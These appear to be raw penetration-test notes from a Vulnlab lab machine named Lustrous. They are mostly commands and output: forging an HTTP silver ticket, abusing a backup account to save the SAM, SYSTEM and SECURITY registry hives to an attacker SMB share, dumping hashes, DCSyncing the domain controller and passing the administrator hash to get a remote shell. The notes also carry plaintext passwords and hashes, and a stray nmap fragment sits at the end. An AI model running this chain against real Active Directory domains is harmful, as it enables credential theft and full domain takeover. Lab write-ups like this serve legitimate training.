tony.ward:U_cPVQqEI50i1X
tony.ward is a backup admin.
HTTP Silver Ticket, the Linux way:
ticketer.py -nthash E67AF8B3D78DF5A02EB0D57B6CB60717 -domain-sid S-1-5-21-2355092754-1584501958-1513963426 -domain lustrous.vl -spn HTTP/lusdc.lustrous.vl -user-id 1114 tony.ward
jkr@ubu(10.8.0.4):~/private/vl-lustrous$ export KRB5CCNAME=tony.ward.ccache
jkr@ubu(10.8.0.4):~/private/vl-lustrous$ firefox
Backup admin priv esc (on LUSDC):
sudo /home/kali/.local/bin/smbserver.py -smb2support "share" .
# Backup privilege lets tony.ward save the registry hives straight to our SMB share:
sudo /home/kali/.local/bin/reg.py lustrous.vl/tony.ward:'U_cPVQqEI50i1X'@LUSDC.lustrous.vl backup -o '\\10.8.0.71\share'
sudo /home/kali/.local/bin/reg.py lustrous.vl/tony.ward:'U_cPVQqEI50i1X'@LUSDC.lustrous.vl save -keyName 'HKLM\SAM' -o '\\10.8.0.71\share'
sudo /home/kali/.local/bin/reg.py lustrous.vl/tony.ward:'U_cPVQqEI50i1X'@LUSDC.lustrous.vl save -keyName 'HKLM\SYSTEM' -o '\\10.8.0.71\share'
sudo /home/kali/.local/bin/reg.py lustrous.vl/tony.ward:'U_cPVQqEI50i1X'@LUSDC.lustrous.vl save -keyName 'HKLM\SECURITY' -o '\\10.8.0.71\share'
┌──(root㉿kali)-[/home/…/results/10.10.232.181/loot/JUNK]
└─# secretsdump.py -sam ./SAM.save -system ./SYSTEM.save -security ./SECURITY.save local
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:962e718ea05d21ad83c87facae92ba76
# The LUSDC$ machine-account hash from the SECURITY hive is enough to DCSync the domain:
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:962e718ea05d21ad83c87facae92ba76 -just-dc 'lustrous.vl/LUSDC$'@10.10.196.101
┌──(root㉿kali)-[/home/kali/BOXES/ACADEMY]
└─# crackmapexec smb 10.10.196.101 -u administrator -H "b8d9c7bd6de2a14237e0eff1afda2476" --shares
SMB 10.10.196.101 445 LUSDC [*] Windows 10.0 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
SMB 10.10.196.101 445 LUSDC [+] lustrous.vl\administrator:b8d9c7bd6de2a14237e0eff1afda2476 (Pwn3d!)
- ADMINISTRATOR SHELL (LUSDC)!
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/22/2021 12:43 PM 36 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
ROOT.TXT: VL{REDIRECTED}
rlwrap psexec.py 'Administrator:XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF@10.10.232.182'
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (85%)
OS CPE: cpe:/o:microsoft:windows_server_2016
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).